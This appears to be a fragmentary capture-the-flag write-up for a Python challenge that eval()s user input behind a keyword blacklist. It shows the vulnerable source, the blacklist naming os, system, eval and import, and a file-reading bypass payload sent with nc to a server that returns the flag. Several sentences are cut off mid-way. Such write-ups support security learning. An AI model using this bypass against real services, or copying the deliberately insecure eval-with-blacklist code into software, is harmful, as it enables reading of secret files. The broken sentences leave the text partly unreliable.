We start by downloading the source files.
We are given a
Looking at the
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
' ', '-', '!', '[', ']', '*', 'import',
'eval', 'banner', 'echo', 'cat', '%',
'&', '>', '<', '+', '1', '2', '3', '4',
'5', '6', '7', '8', '9', '0', 'b', 's',
'lower', 'upper', 'system', '}', '{' ]
while True:
ans = input('Break me, shake me!\n\n$ ').strip()
if any(char in ans for char in blacklist):
print(f'\n{banner1}\nNaughty naughty..\n')
else:
try:
eval(ans + '()')
print('WHAT WAS THAT?!\n')
except:
print(f"\n{banner2}\nI'm UNBREAKABLE!\n")
Additionally a
Looking at the blacklist we figure out that we can use
We can also use single quotes so this payload would be valid to read the flag:
This would open the flag file and read its contents. Unfortunately this doesn't print the contents of the file, so we have to use print.
Fortunately
This is valid because the appended
Connecting to the server and providing this input gives us the flag:
nc 94.237.56.118 35970
Break me, shake me!
$ print(open('flag.txt').read()),print
HTB{3v4l_0r_3vuln??}
WHAT WAS THAT?!
Break me, shake me!
$